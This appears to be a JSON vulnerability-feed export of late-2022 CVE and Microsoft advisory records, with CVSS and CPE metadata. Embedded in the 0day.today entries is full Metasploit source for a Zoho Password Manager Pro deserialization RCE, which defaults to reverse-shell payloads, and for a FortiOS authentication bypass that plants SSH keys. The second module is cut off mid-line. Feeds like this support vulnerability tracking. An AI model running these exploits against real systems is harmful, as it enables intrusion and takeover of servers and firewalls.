"cpe:2.3:o:microsoft:windows_11:22h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x86:*"]}, {"lastseen": "2023-02-09T14:37:44", "description": "Active Directory Certificate Services Elevation of Privilege Vulnerability.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-11T19:15:00", "type": "cve", "title": "CVE-2022-37976", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-37976"], "modified": "2022-10-12T18:29:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2019:-"], "id": "CVE-2022-37976", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-37976", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:43:06", "description": "An authentication bypass using an alternate path or channel [CWE-288] in Fortinet FortiOS version 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy version 7.2.0 and version 7.0.0 through 7.0.6 and FortiSwitchManager version 7.2.0 and 7.0.0 allows an unauthenticated atttacker to perform operations on the administrative interface via specially crafted HTTP or HTTPS requests.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-18T14:15:00", "type": "cve", "title": "CVE-2022-40684", "cwe": ["CWE-306"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-40684"], "modified": "2022-10-20T19:06:00", "cpe": ["cpe:/a:fortinet:fortiswitchmanager:7.0.0", "cpe:/a:fortinet:fortiproxy:7.2.0", "cpe:/a:fortinet:fortiswitchmanager:7.2.0"], "id": "CVE-2022-40684", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-40684", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": ["cpe:2.3:a:fortinet:fortiswitchmanager:7.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:fortinet:fortiproxy:7.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:fortinet:fortiswitchmanager:7.0.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:43:34", "description": "Microsoft Edge (Chromium-based) Spoofing Vulnerability.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", 
"privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2022-10-11T19:15:00", "type": "cve", "title": "CVE-2022-41035", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-41035"], "modified": "2022-11-14T14:41:00", "cpe": [], "id": "CVE-2022-41035", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-41035", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": []}, {"lastseen": "2023-03-02T23:39:02", "description": "Microsoft Exchange Server Elevation of Privilege Vulnerability.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-03T01:15:00", "type": "cve", "title": "CVE-2022-41040", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-41040"], "modified": "2023-03-02T22:15:00", "cpe": ["cpe:/a:microsoft:exchange_server:2019", "cpe:/a:microsoft:exchange_server:2013", "cpe:/a:microsoft:exchange_server:2016"], "id": "CVE-2022-41040", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-41040", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": ["cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_22:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_12:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_11:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_23:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:28:28", 
"description": "A code injection vulnerability in the User Portal and Webadmin allows a remote attacker to execute code in Sophos Firewall version v19.0 MR1 and older.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-23T13:15:00", "type": "cve", "title": "CVE-2022-3236", "cwe": ["CWE-74"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-3236"], "modified": "2022-09-28T19:11:00", "cpe": ["cpe:/a:sophos:firewall:19.0.1"], "id": "CVE-2022-3236", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-3236", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": ["cpe:2.3:a:sophos:firewall:19.0.1:*:*:*:*:*:*:*"]}], "mscve": [{"lastseen": "2023-03-17T02:31:48", "description": "Microsoft Office Information Disclosure Vulnerability.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 3.3, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2022-10-11T07:00:00", "type": "mscve", "title": "Microsoft Office Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {}, "cvelist": ["CVE-2022-41043"], "modified": "2022-12-13T08:00:00", "id": "MS:CVE-2022-41043", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41043", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-03-17T02:31:54", 
"description": "Microsoft Office Remote Code Execution Vulnerability.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-10-11T07:00:00", "type": "mscve", "title": "Microsoft Office Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {}, "cvelist": ["CVE-2022-38048"], "modified": "2022-10-11T07:00:00", "id": "MS:CVE-2022-38048", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-38048", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-03-17T02:31:55", "description": "Microsoft has identified a vulnerability affecting the cluster connect feature of Azure Arc-enabled Kubernetes clusters. This vulnerability could allow an unauthenticated user to elevate their privileges and potentially gain administrative control over the Kubernetes cluster. 
Additionally, because Azure Stack Edge allows customers to deploy Kubernetes workloads on their devices via Azure Arc, Azure Stack Edge devices are also vulnerable to this vulnerability.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-10-11T07:00:00", "type": "mscve", "title": "Azure Arc-enabled Kubernetes cluster Connect Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {}, "cvelist": ["CVE-2022-37968"], "modified": "2022-10-11T07:00:00", "id": "MS:CVE-2022-37968", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-37968", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-03-17T02:31:48", "description": "Windows COM+ Event System Service Elevation of Privilege Vulnerability.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-11T07:00:00", "type": "mscve", "title": "Windows COM+ Event System Service Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {}, "cvelist": ["CVE-2022-41033"], "modified": "2022-10-11T07:00:00", "id": "MS:CVE-2022-41033", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41033", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": 
"2023-03-17T02:31:56", "description": "Windows CryptoAPI Spoofing Vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-10-11T07:00:00", "type": "mscve", "title": "Windows CryptoAPI Spoofing Vulnerability", "bulletinFamily": "microsoft", "cvss2": {}, "cvelist": ["CVE-2022-34689"], "modified": "2022-10-11T07:00:00", "id": "MS:CVE-2022-34689", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-34689", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-03-17T02:31:56", "description": "Windows TCP/IP Driver Denial of Service Vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-10-11T07:00:00", "type": "mscve", "title": "Windows TCP/IP Driver Denial of Service Vulnerability", "bulletinFamily": "microsoft", "cvss2": {}, "cvelist": ["CVE-2022-33645"], "modified": "2022-10-11T07:00:00", "id": "MS:CVE-2022-33645", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-33645", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-03-17T02:31:52", "description": "Active Directory Certificate Services Elevation of Privilege Vulnerability.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", 
"confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-11T07:00:00", "type": "mscve", "title": "Active Directory Certificate Services Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {}, "cvelist": ["CVE-2022-37976"], "modified": "2022-10-18T07:00:00", "id": "MS:CVE-2022-37976", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-37976", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-03-17T02:31:56", "description": "Microsoft Edge (Chromium-based) Spoofing Vulnerability.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2022-10-03T07:00:00", "type": "mscve", "title": "Microsoft Edge (Chromium-based) Spoofing Vulnerability", "bulletinFamily": "microsoft", "cvss2": {}, "cvelist": ["CVE-2022-41035"], "modified": "2022-11-08T08:00:00", "id": "MS:CVE-2022-41035", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41035", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-03-17T02:31:56", "description": "Microsoft Exchange Server Elevation of Privilege Vulnerability.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": 
"HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T07:00:00", "type": "mscve", "title": "Microsoft Exchange Server Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {}, "cvelist": ["CVE-2022-41040"], "modified": "2022-11-08T08:00:00", "id": "MS:CVE-2022-41040", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41040", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2022-08-04T10:00:02", "description": "This Metasploit module exploits a Java deserialization vulnerability in Zoho ManageEngine Pro before 12101 and PAM360 before 5510. Unauthenticated attackers can send a crafted XML-RPC request containing malicious serialized data to /xmlrpc to gain remote command execution as the SYSTEM user.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-04T00:00:00", "type": "zdt", "title": "Zoho Password Manager Pro XML-RPC Java Deserialization Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-35405"], "modified": "2022-08-04T00:00:00", "id": "1337DAY-ID-37890", "href": "https://0day.today/exploit/description/37890", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include 
Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n include Msf::Exploit::JavaDeserialization\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Zoho Password Manager Pro XML-RPC Java Deserialization',\n 'Description' => %q{\n This module exploits a Java deserialization vulnerability in Zoho ManageEngine Pro\n before 12101 and PAM360 before 5510. Unauthenticated attackers can send a\n crafted XML-RPC request containing malicious serialized data to /xmlrpc to\n gain RCE as the SYSTEM user.\n },\n 'Author' => [\n 'Vinicius', # Discovery\n 'Y4er', # Writeup\n 'Grant Willcox' # Exploit\n ],\n 'References' => [\n ['CVE', '2022-35405'],\n ['URL', 'https://xz.aliyun.com/t/11578'], # Writeup\n ['URL', 'https://www.manageengine.com/products/passwordmanagerpro/advisory/cve-2022-35405.html'], # Advisory\n ['URL', 'https://archives2.manageengine.com/passwordmanagerpro/12101/ManageEngine_PasswordManager_Pro_12100_to_12101.ppm'] # The patch.\n ],\n 'DisclosureDate' => '2022-06-24', # Vendor release date of patch and new installer, as advisory lacks any date.\n 'License' => MSF_LICENSE,\n 'Platform' => ['win'],\n 'Arch' => [ARCH_CMD, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Windows EXE Dropper',\n {\n 'Arch' => ARCH_X64,\n 'Type' => :windows_dropper,\n 'DefaultOptions' => { 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' }\n }\n ],\n [\n 'Windows Command',\n {\n 'Arch' => ARCH_CMD,\n 'Type' => :windows_command,\n 'Space' => 3000,\n 'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/reverse_powershell' }\n }\n ],\n [\n 'Windows Powershell',\n {\n 'Arch' => ARCH_X64,\n 'Type' => :windows_powershell,\n 'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell/x64/meterpreter/reverse_tcp' }\n }\n ]\n ],\n 'DefaultTarget' => 1,\n 'DefaultOptions' => {\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n 
register_options([\n Opt::RPORT(7272),\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n # Send an empty serialized object\n res = send_request_xmlrpc('')\n\n unless res\n return CheckCode::Unknown('Target did not respond to check.')\n end\n\n if res.body.include?('Failed to read result object: null')\n return CheckCode::Vulnerable('Target can deserialize arbitrary data.')\n end\n\n CheckCode::Safe('Target cannot deserialize arbitrary data.')\n end\n\n def exploit\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n case target['Type']\n when :windows_command\n execute_command(payload.encoded)\n when :windows_dropper\n cmd_target = targets.select { |target| target['Type'] == :windows_command }.first\n execute_cmdstager({ linemax: cmd_target.opts['Space'] })\n when :windows_powershell\n execute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true))\n end\n end\n\n def execute_command(cmd, _opts = {})\n vprint_status(\"Executing command: #{cmd}\")\n\n res = send_request_xmlrpc(\n generate_java_deserialization_for_command('CommonsBeanutils1', 'cmd', cmd)\n )\n\n unless res && res.code == 200\n fail_with(Failure::UnexpectedReply, \"Failed to execute command: #{cmd}\")\n end\n\n print_good(\"Successfully executed command: #{cmd}\")\n end\n\n def send_request_xmlrpc(data)\n # http://xmlrpc.com/\n # https://ws.apache.org/xmlrpc/\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/xmlrpc'),\n 'ctype' => 'text/xml',\n 'data' => <<~XML\n <?xml version=\"1.0\"?>\n <methodCall>\n <methodName>#{rand_text_alphanumeric(8..42)}</methodName>\n <params>\n <param>\n <value>\n <struct>\n <member>\n <name>#{rand_text_alphanumeric(8..42)}</name>\n <value>\n <serializable xmlns=\"http://ws.apache.org/xmlrpc/namespaces/extensions\">#{Rex::Text.encode_base64(data)}</serializable>\n </value>\n </member>\n </struct>\n </value>\n </param>\n </params>\n </methodCall>\n XML\n )\n 
end\n\nend\n", "sourceHref": "https://0day.today/exploit/37890", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-20T22:08:29", "description": "This Metasploit module exploits an authentication bypass vulnerability in the Fortinet FortiOS, FortiProxy, and FortiSwitchManager API to gain access to a chosen account and then adds an SSH key to the authorized_keys file of the chosen account, allowing you to login to the system with the chosen account. Successful exploitation results in remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-19T00:00:00", "type": "zdt", "title": "Fortinet FortiOS / FortiProxy / FortiSwitchManager Authentication Bypass Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-40684"], "modified": "2022-10-19T00:00:00", "id": "1337DAY-ID-38045", "href": "https://0day.today/exploit/description/38045", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::SSH\n prepend Msf::Exploit::Remote::AutoCheck\n\n attr_accessor :ssh_socket\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Fortinet FortiOS, FortiProxy, and FortiSwitchManager authentication bypass.',\n 'Description' => %q{\n This module exploits an authentication bypass vulnerability\n in the Fortinet FortiOS, FortiProxy, and FortiSwitchManager API\n to gain access to a chosen 
account. And then add a SSH key to the\n authorized_keys file of the chosen account, allowing\n to login to the system with the chosen account.\n\n Successful exploitation results in remote code execution.\n },\n 'Author' => [\n 'Heyder Andrade <@HeyderAndrade>', # Metasploit module\n 'Zach Hanley <@hacks_zach>', # PoC\n ],\n 'References' => [\n ['CVE', '2022-40684'],\n ['URL', 'https://www.fortiguard.com/psirt/FG-IR-22-377'],\n ['URL', 'https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684'],\n ],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => '2022-10-10', # Vendor advisory\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'FortiOS',\n {\n 'DefaultOptions' => {\n 'PAYLOAD' => 'generic/ssh/interact'\n },\n 'Payload' => {\n 'Compat' => {\n 'PayloadType' => 'ssh_interact'\n }\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [\n IOC_IN_LOGS,\n ARTIFACTS_ON_DISK # SSH key is added to authorized_keys file\n ]\n }\n )\n )\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to the Fortinet CMDB API', '/api/v2/cmdb/']),\n OptString.new('USERNAME', [false, 'Target username (Default: auto-detect)', nil]),\n OptString.new('PRIVATE_KEY', [false, 'SSH private key file path', nil]),\n OptString.new('KEY_PASS', [false, 'SSH private key password', nil]),\n OptString.new('SSH_RPORT', [true, 'SSH port to connect to', 22]),\n OptBool.new('PREFER_ADMIN', [false, 'Prefer to use the admin user if one is detected', true])\n ]\n )\n end\n\n def username\n if datastore['USERNAME']\n @username ||= datastore['USERNAME']\n else\n @username ||= detect_username\n end\n end\n\n def ssh_rport\n datastore['SSH_RPORT']\n end\n\n def current_keys\n @current_keys ||= read_keys\n end\n\n def 
ssh_keygen\n # ssh-keygen -t rsa -m PEM -f `openssl rand -hex 8`\n if datastore['PRIVATE_KEY']\n @ssh_keygen ||= Net::SSH::KeyFactory.load_data_private_key(\n File.read(datastore['PRIVATE_KEY']),\n datastore['KEY_PASS'],\n datastore['PRIVATE_KEY']\n )\n else\n @ssh_keygen ||= OpenSSL::PKey::EC.generate('prime256v1')\n end\n end\n\n def ssh_private_key\n ssh_keygen.to_pem\n end\n\n def ssh_pubkey\n Rex::Text.encode_base64(ssh_keygen.public_key.to_blob)\n end\n\n def authorized_keys\n pubkey = Rex::Text.encode_base64(ssh_keygen.public_key.to_blob)\n \"#{ssh_keygen.ssh_type} #{pubkey} #{username}@localhost\"\n end\n\n def fortinet_request(params = {})\n send_request_cgi(\n {\n 'ctype' => 'application/json',\n 'agent' => 'Report Runner',\n 'headers' => {\n 'Forwarded' => \"for=\\\"[127.0.0.1]:#{rand(1024..65535)}\\\";by=\\\"[127.0.0.1]:#{rand(1024..65535)}\\\"\"\n }\n }.merge(params)\n )\n end\n\n def check\n vprint_status(\"Checking #{datastore['RHOST']}:#{datastore['RPORT']}\")\n # a normal request to the API should return a 401\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, Rex::Text.rand_text_alpha_lower(6)),\n 'ctype' => 'application/json'\n })\n\n return CheckCode::Unknown('Target did not respond to check.') unless res\n return CheckCode::Safe('Target seems not affected by this vulnerability.') unless res.code == 401\n\n # Trying to bypasss the authentication and get the sshkey from the current targeted user it should return a 200 if vulnerable\n res = fortinet_request({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/system/status')\n })\n\n return CheckCode::Safe unless res&.code == 200\n\n version = res.get_json_document['version']\n\n print_good(\"Target is running the version #{version}, which is vulnerable.\")\n\n Socket.tcp(rhost, ssh_rport, connect_timeout: datastore['SSH_TIMEOUT']) { |sock| return CheckCode::Safe('However SSH is not open, so adding a ssh key wouldn\\t give you access to the 
host.') unless sock }\n\n CheckCode::Vulnerable('And SSH is running which makes it exploitable.')\n end\n\n def cleanup\n return unless ssh_socket\n\n # it assumes our key is the last one and set it to a random text. The API didn't respond to DELETE method\n data = {\n \"ssh-public-key#{current_keys.empty? ? '1' : current_keys.size}\" => '\"\"'\n }\n\n fortinet_request({\n 'method' => 'PUT',\n 'uri' => normalize_uri(target_uri.path, '/system/admin/', username),\n 'data' => data.to_json\n })\n end\n\n def detect_username\n vprint_status('User auto-detection...')\n res = fortinet_request(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/system/admin')\n )\n users = res.get_json_document['results'].collect { |e| e['name'] if (e['accprofile'] == 'super_admin' && e['trusthost1'] == '0.0.0.0 0.0.0.0') }.compact\n # we prefer to use admin, but if it doesn't exist we chose a random one.\n if datastore['PREFER_ADMIN']\n vprint_status(\"PREFER_ADMIN is #{datastore['PREFER_ADMIN']}, but if it isn't found we will pick a random one.\")\n users.include?('admin') ? 
